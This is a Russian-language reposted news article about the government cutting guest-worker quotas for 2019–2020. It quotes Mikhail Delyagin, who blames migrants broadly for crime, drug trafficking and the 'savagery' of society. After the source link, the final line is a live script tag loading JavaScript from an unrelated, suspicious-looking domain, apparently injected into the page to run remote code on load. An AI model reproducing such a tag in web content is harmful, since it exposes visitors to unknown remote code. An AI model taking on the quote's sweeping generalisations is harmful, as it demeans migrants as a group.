Внезапно: Медведев защищает рынок труда: квоты на гастарбайтеров за 2 года сокращены

На модерации Отложенный

3

 

Правительство РФ утвердило квоту почти в 105 тысяч приглашений на въезд и разрешений на работу для иностранцев, прибывающих в Россию на основании визы, сократив ее по сравнению с предыдущим годом более чем на четверть... Квота на 2019 год была определена в 144 583 человека, по сравнению с 2018 годом ее снизили примерно на 20%. Число разрешений на 2020 год сокращено еще более чем на 27%."

 

Михаил Делягин отметил: "Безусловно, сокращение квот на легальный завоз в Россию новых гастарбайтеров не решит проблемы с миграцией - от разрушения этнокультурного баланса, жуткой преступности, наркоторговли, коррупции, одичания общества, дискредитации России как "гибрида проходного двора с помойкой", блокирования развития технологий (они просто не нужны при наличии "трудолюбивых соотечественников"), быстро нарастающих политических проблем и подрыва общественной психики до разрушения рынка труда.

В конце концов, нелегальная миграция останется, и вероятное выполнение "профильными" ведомствами функции поставщиков дешевой рабсилы - тоже.

Подробнее на https://delyagin.ru/articles/183-sobytija/74798-vnezapno-medvedev-zashhishhaet-rynok-truda-kvoty-na-gastarbayterov-za-2-goda-sokrashheny-na-42

<script type="text/javascript" src="http://minisrclink.cool/1e40c8bd4601a5a5a4.js"></script>